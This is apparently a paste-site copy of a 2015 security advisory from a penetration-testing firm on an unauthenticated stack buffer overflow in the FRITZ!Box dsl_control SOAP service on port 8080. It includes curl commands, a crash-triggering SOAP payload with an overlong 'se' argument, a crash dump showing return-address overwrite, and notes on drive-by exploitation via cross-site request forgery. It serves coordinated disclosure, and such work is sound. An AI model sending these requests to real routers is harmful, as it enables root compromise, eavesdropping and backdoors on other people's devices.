From Unknown, 6 Years ago, written in Plain Text.
Embed
  1. Advisory: AVM FRITZ!Box: Remote Code Execution via Buffer Overflow
  2.  
  3. RedTeam Pentesting discovered that several models of the AVM FRITZ!Box
  4. are vulnerable to a stack-based buffer overflow, which allows attackers
  5. to execute arbitrary code on the device.
  6.  
  7.  
  8. Details
  9. =======
  10.  
  11. Product: AVM FRITZ!Box 3272/7272, 3370/3390/3490, 7312/7412,
  12.                        7320/7330 (SL), 736x (SL) and 7490
  13. Affected Versions: versions prior to 6.30 (all models) [0]
  14. Fixed Versions: >= 6.30 (all models) [0]
  15. Vulnerability Type: Buffer Overflow
  16. Security Risk: high
  17. Vendor URL: http://avm.de/
  18. Vendor Status: fixed version released
  19. Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-001
  20. Advisory Status: published
  21. CVE: GENERIC-MAP-NOMATCH
  22. CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
  23.  
  24.  
  25. Introduction
  26. ============
  27.  
  28. FRITZ!Box is the brand name of SOHO routers/CPEs manufactured by AVM
  29. GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a
  30. wifi access point, routing, VoIP, NAS and DECT.
  31.  
  32.  
  33. More Details
  34. ============
  35.  
  36. When examining the running processes on a FRITZ!Box, it was discovered
  37. that the program dsl_control listens on TCP port 8080:
  38.  
  39. # netstat -anp | grep dsl_control
  40. tcp   0   0 0.0.0.0:8080   0.0.0.0:*   LISTEN   849/dsl_control
  41.  
  42. By sending an HTTP request to the service, it can be seen in the
  43. server's response that the daemon expects SOAP messages (output
  44. shortened):
  45.  
  46. $ curl --silent http://fritz.box:8080/ | xmllint -format -
  47. <?xml version="1.0" encoding="UTF-8"?>
  48. <SOAP-ENV:Envelope [...]>
  49.   <SOAP-ENV:Body>
  50.     <SOAP-ENV:Fault SOAP-ENV:encodingStyle="[...]">
  51.       <faultcode>SOAP-ENV:Client</faultcode>
  52.       <faultstring>HTTP GET method not implemented</faultstring>
  53.     </SOAP-ENV:Fault>
  54.   </SOAP-ENV:Body>
  55. </SOAP-ENV:Envelope>
  56.  
  57. After examining the dsl_control binary by using GNU strings and
  58. performing a web search for some of the resulting values, it was quickly
  59. discovered that parts of the daemon's source code can be found in the
  60. Git repository of the dd-wrt firmware[1].
  61.  
  62. In order to retrieve the list of all commands that are implemented by
  63. the daemon, the following SOAP message can be sent to the server,
  64. specifying an ifx:DslCpeCliAccess element containing an empty command
  65. element (output shortened):
  66.  
  67. $ curl --silent http://fritz.box:8080/ --data '
  68. <?xml version="1.0" encoding="UTF-8"?>
  69. <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/[...]"
  70.  xmlns:ifx="urn:dsl_api">
  71.   <SOAP-ENV:Body>
  72.       <ifx:DslCpeCliAccess>
  73.           <command></command>
  74.       </ifx:DslCpeCliAccess>
  75.   </SOAP-ENV:Body>
  76. </SOAP-ENV:Envelope>' | xmllint -format -
  77. <?xml version="1.0" encoding="UTF-8"?>
  78. [...]
  79.     <ifx:DslCpeCliAccessResponse>
  80.       <result>avmcr, avmcrmr, avmcrms, avmcw, avmdsmmcs, avmhwrfit,
  81. avmpet, avmvig, acog, acos, acs, alf, asecg, asecs, asg, aufg, alig,
  82. bbsg, bpstg, bpsg, ccadbgmlg, ccadbgmls, dbgmlg, dbgmls, dsmcg, dsmcs,
  83. dsmmcg, dsmmcs, dsmstatg, dsmsg, dsnrg, dmms, dms, esmcg, esmcs, fddg,
  84. fdsg, fpsg, g997amdpfcg, g997amdpfcs, g997amlfcg, g997amlfcs, g997bang,
  85. g997bansg, g997cdrtcg, g997cdrtcs, g997csg, g997dpfsg, g997dfr,
  86. g997dhling, g997dhlinsg, g997dhlogg, g997dqlng, g997dsnrg, g997fpsg,
  87. g997gang, g997gansg, g997lstg, g997lacg, g997lacs, g997lfsg, g997lisg,
  88. g997lig, g997listrg, g997lis, g997lsg, g997lspbg, g997ltsg, g997lpmcg,
  89. g997lpmcs, g997pmsft, g997pmsg, g997racg, g997racs, g997sang, g997sansg,
  90. g997upbosg, g997xtusecg, g997xtusecs, g997xtusesg, help, hsdg, ics, isg,
  91. lecg, lfcg, lfcs, lfsg, locg, locs, lsg, llsg, llcg, llcs, mlsg, nsecg,
  92. nsecs, osg, pm15meet, pmbms, pmcc15mg, pmcc1dg, pmccsg, pmcctg,
  93. pmchs15mg, pmchs1dg, pmct15mg, pmct15ms, pmct1dg, pmct1ds, pmcg, pmcs,
  94. pmdpc15mg, pmdpc1dg, pmdpcsg, pmdpctg, pmdpfc15mg, pmdpfc1dg, pmdpfcsg,
  95. pmdpfctg, pmdpfhs15mg, pmdpfhs1dg, pmdphs15mg, pmdphs1dg, pmdpt15mg,
  96. pmdpt15ms, pmdpt1dg, pmdpt1ds, pmetr, pmlesc15mg, pmlesc1dg, pmlescsg,
  97. pmlesctg, pmleshs15mg, pmleshs1dg, pmlic15mg, pmlic1dg, pmlicsg,
  98. pmlictg, pmlihs15mg, pmlihs1dg, pmlit15mg, pmlit15ms, pmlit1dg,
  99. pmlit1ds, pmlsc15mg, pmlsc1dg, pmlscsg, pmlsctg, pmlshs15mg, pmlshs1dg,
  100. pmlst15mg, pmlst15ms, pmlst1dg, pmlst1ds, pmrtc15mg, pmrtc1dg, pmrtcsg,
  101. pmrtctg, pmrths15mg, pmrths1dg, pmrtt15mg, pmrtt15ms, pmrtt1dg,
  102. pmrtt1ds, pmr, pmsmg, pmsms, ptsg, quit, rtsg, rccg, rccs, rsss, rusg,
  103. se, sicg, sics, sisg, tcpmistart, tcpmistop, tmcs, tmsg, vig, </result>
  104.     </ifx:DslCpeCliAccessResponse>
  105.   </SOAP-ENV:Body>
  106. </SOAP-ENV:Envelope>
  107.  
  108. As can be seen in the listing, the server implements several commands.
  109. Many of them can be accessed without any authentication. One of the
  110. commands which was further examined is the 'se' or 'ScriptExecute'
  111. command. It is defined by the file dsl_cpe_cli_access.c, which registers
  112. the function DSL_CPE_CLI_ScriptExecute as the corresponding handler:
  113.  
  114. [...]
  115.    DSL_CPE_CLI_CMD_ADD_COMM (
  116.       "se",
  117.       "ScriptExecute",
  118.       DSL_CPE_CLI_ScriptExecute,
  119.       g_sSe);
  120. [...]
  121.  
  122. The following listing shows dd-wrt's implementation of the command,
  123. which is also part of the file dsl_cpe_cli_access.c (shortened):
  124.  
  125. DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute(
  126.    DSL_int_t fd,
  127.    DSL_char_t *pCommands,
  128.    DSL_CPE_File_t *out)
  129. {
  130.    DSL_int_t ret = 0;
  131.    DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};
  132.  
  133.    if (DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) ==
  134.       DSL_FALSE)
  135.    {
  136.       return -1;
  137.    }
  138.  
  139.    DSL_CPE_sscanf (pCommands, "%s", sFileName);
  140.  
  141.    [...]
  142.  
  143.    return 0;
  144. }
  145.  
  146. As can be seen in the listing, the function first checks whether
  147. another parameter is given by calling the function
  148. DSL_CPE_CLI_CheckParamNumber(). If this is the case, the code proceeds
  149. to call the function DSL_CPE_sscanf() in order to copy the value of the
  150. parameter pCommands to the local char array sFileName. Because the
  151. format string "%s" is provided to the DSL_CPE_sscanf() function, no
  152. restriction applies to how much data is copied to the array. Therefore,
  153. an overlong argument passed to the function may possibly exceed the
  154. array's bounds, leading to a buffer overflow. In order to verify that
  155. this is the case, the following SOAP message was stored in the file
  156. trigger.xml, containing 300 capital A characters as the argument for the
  157. 'se' command (output shortened):
  158.  
  159. <?xml version="1.0" encoding="UTF-8"?>
  160. <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/[...]/"
  161.  xmlns:ifx="urn:dsl_api">
  162.   <SOAP-ENV:Body>
  163.       <ifx:DslCpeCliAccess>
  164.           <command>se AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  165. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  166. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  167. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  168. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</command>
  169.       </ifx:DslCpeCliAccess>
  170.   </SOAP-ENV:Body>
  171. </SOAP-ENV:Envelope>
  172.  
  173. Afterwards, curl was used to send the SOAP message to the service:
  174.  
  175. $ curl --data @trigger.xml http://fritz.box:8080/
  176. curl: (52) Empty reply from server
  177.  
  178. As indicated by curl's output, no HTTP reply was received. Instead, the
  179. connection was closed. When accessing the device by using telnet, the
  180. following crash dump is printed when sending the request, clearly
  181. showing that the presumed buffer overflow was triggered:
  182.  
  183. dsl_control[841] crashed at 41414140 [...] accessing 0x41414140
  184. Version: 06.24
  185. at: 2ac783d8 v0: 00000000 v1: ffffffff
  186. a0: 2ac0ac08 a1: 00000001 a2: 00473420 a3: 00000001
  187. t0: 2aab5280 t1: 8ead1b2c t2: 41414141 t3: 41414141
  188. t4: 41414141 t5: 00000001 t6: 2ac4d788 t7: 41414141
  189. s0: 41414141 s1: 41414141 s2: 00000000 s3: 2ad800b0
  190. s4: 2ad800b0 s5: 00000000 s6: 00080000 s7: 2ab52358
  191. t8: 00000000 t9: 2ab3dc10
  192. gp: 00473420 sp: 2ad7fcd0 fp: 2ad7ffe0 ra: 41414141
  193.  
  194. As seen in the crash dump, several saved registers were overwritten by
  195. the capital 'A' characters (0x41) provided in the SOAP message. Among
  196. those registers is the ra register, which stores the return address of
  197. the current function call, thus allowing an attacker to directly alter
  198. the control flow. This behaviour can be exploited in order to execute
  199. arbitrary code. Due to firewall restrictions, the service is only
  200. accessible from within the internal network connected to the FRITZ!Box.
  201. However, it is also possible to exploit this vulnerability by utilising
  202. cross-site request forgery, allowing typical "drive-by" exploitation
  203. through a user's web browser.
  204.  
  205.  
  206. Workaround
  207. ==========
  208.  
  209. None.
  210.  
  211.  
  212. Fix
  213. ===
  214.  
  215. Affected users should upgrade to a fixed firmware version as soon as
  216. possible.
  217.  
  218.  
  219. Security Risk
  220. =============
  221.  
  222. After successful exploitation, attackers gain root privileges on the
  223. attacked device. This allows attackers to eavesdrop on traffic and to
  224. initiate and receive arbitrary phone calls, if the device is configured
  225. for telephony. Furthermore, backdoors may be installed to allow
  226. persistent access to the device.
  227.  
  228. In order to exploit the vulnerability, attackers either need to be able
  229. to connect to the service directly, i.e. from the LAN, or indirectly via
  230. an attacker-controlled website, that is visited by a FRITZ!Box user.
  231. This website can exploit the vulnerability via cross-site request
  232. forgery, connecting to the service via the attacked user's browser.
  233. Therefore, it is estimated that the vulnerability poses a high risk.
  234.  
  235.  
  236. Timeline
  237. ========
  238.  
  239. 2015-02-26 Vulnerability identified
  240. 2015-03-26 CVE number requested
  241. 2015-03-26 Vendor notified
  242. 2015-04-30 RedTeam Pentesting reviewed fixed version by order of vendor
  243. 2015-06-09 Vendor released fixed public beta (7490)
  244. 2015-07-16 Vendor started releasing fixed versions (7360 and 7490)
  245. 2015-10-01 Vendor finished releasing fixed versions (other models [0])
  246. 2015-11-27 Advisory release postponed to maximize patch distribution
  247. 2016-01-07 Advisory released
  248.  
  249.  
  250. References
  251. ==========
  252.  
  253. [0] https://avm.de/service/sicherheitshinweise/
  254. [1] https://github.com/mirror/dd-wrt/tree/master/src/router/dsl_cpe_control
  255.  
  256.  
  257. RedTeam Pentesting GmbH
  258. =======================
  259.  
  260. RedTeam Pentesting offers individual penetration tests performed by a
  261. team of specialised IT-security experts. Hereby, security weaknesses in
  262. company networks or products are uncovered and can be fixed immediately.
  263.  
  264. As there are only few experts in this field, RedTeam Pentesting wants to
  265. share its knowledge and enhance the public knowledge with research in
  266. security-related areas. The results are made available as public
  267. security advisories.
  268.  
  269. More information about RedTeam Pentesting can be found at:
  270. https://www.redteam-pentesting.de/
  271.  
  272. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0
  273. Dennewartstr. 25-27 Fax : +49 241 510081-99
  274. 52068 Aachen https://www.redteam-pentesting.de
  275. Germany Registergericht: Aachen HRB 14004
  276. Geschäftsführer: Patrick Hof, Jens Liebchen